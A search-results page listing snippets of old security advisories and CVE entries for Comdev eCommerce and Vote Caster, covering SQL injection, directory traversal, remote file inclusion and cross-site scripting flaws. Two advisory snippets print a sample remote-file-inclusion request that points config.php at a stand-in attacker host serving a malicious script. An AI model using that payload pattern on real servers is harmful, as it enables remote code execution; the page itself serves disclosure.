120 matches found
Comdev Vote Caster 3.1 - 'index.php' SQL Injection
source: https://www.securityfocus.com/bid/15563/info Comdev Vote Caster is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of t...
CVE-2005-2543
The CVE-2005-2543 entry describes a directory traversal vulnerability in Comdev eCommerce 3.0, specifically in wce.download.php, where the download parameter can be abused with a .. (dot dot) to download arbitrary files. Affected product/component: Comdev eCommerce 3.0 / wce.download.php. Root ca...
CVE-2005-2543
Directory traversal vulnerability in wce.download.php in Comdev eCommerce 3.0 allows remote attackers to download arbitrary files via a .. (dot dot) in the download parameter...
CVE-2005-2544
PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the path[docroot] parameter...
CVE-2005-2544
The CVE-2005-2544 entry concerns Comdev eCommerce 3.0, where a PHP remote file inclusion flaw in config.php allows an attacker to execute arbitrary PHP code via path[docroot]. This is evidenced by multiple sources (NVD/CVE records and a Nessus plugin) describing remote code execution possibilitie...
Comdev eCommerce 3.0 Multiple Vulnerabilities (RFI, Traversal)
The remote host is running eCommerce, a web-based shopping system from Comdev. The installed version of eCommerce allows remote attackers to control the 'path[docroot]' parameter used when including PHP code in the 'config.php' script. By leveraging this flaw, an attacker may be able to view...
comdevTraversal.txt
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The wce.download.php script present in two locations can be passed a "download" http request parameter to download an arbitrary file on the vulnerable server. Example:...
comdevInclusion.txt
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
Comdev eCommerce config.php Vulnerability
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/14478/info Comdev eCommerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary server-side script code on an...
Comdev eCommerce 3.0 - 'WCE.download.php' Directory Traversal
source: https://www.securityfocus.com/bid/14479/info Comdev eCommerce is prone to a directory traversal vulnerability. A remote unauthorized user can disclose the contents of arbitrary local files through the use of directory traversal strings '../' relative to the Web application's root path...
Comdev eCommerce 3.0 - WCE.download.php Directory Traversal
source: https://www.securityfocus.com/bid/14479/info Comdev eCommerce is prone to a directory traversal vulnerability. A remote unauthorized user can disclose the contents of arbitrary local files through the use of directory traversal...
Comdev eCommerce 3.0 - config.php Remote File Inclusion
source: https://www.securityfocus.com/bid/14478/info Comdev eCommerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this...
CVE-2005-2138
CVE-2005-2138 describes a Cross-site Scripting (XSS) vulnerability in the Comdev eCommerce 3.0 and 3.1 product line, specifically in index.php. The flaw allows remote attackers to inject arbitrary web script or HTML by injecting Javascript into the onMouseOver event of an anchor tag in a review m...
CVE-2005-2138
Cross-site scripting (XSS) vulnerability in index.php in Comdev eCommerce 3.0 and 3.1 allows remote attackers to inject arbitrary web script or HTML via Javascript in the onMouseOver event of an "A" tag in a review message...
[SA15865] Comdev eCommerce Review Script Insertion Vulnerability
Are you interested in a new job in IT security? Secunia has two open positions as Junior and Senior Specialist in IT security: http://secunia.com/secuniavacancies/...
[UNIX] Comdev eCommerce Cross Site Scripting
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
Comdev eCommerce 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/12382/info Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks. Comdev eCommerce 3.0 is reported prone to these issues. It is...
Comdev eCommerce 3.0 - index.php Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/12382/info Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as...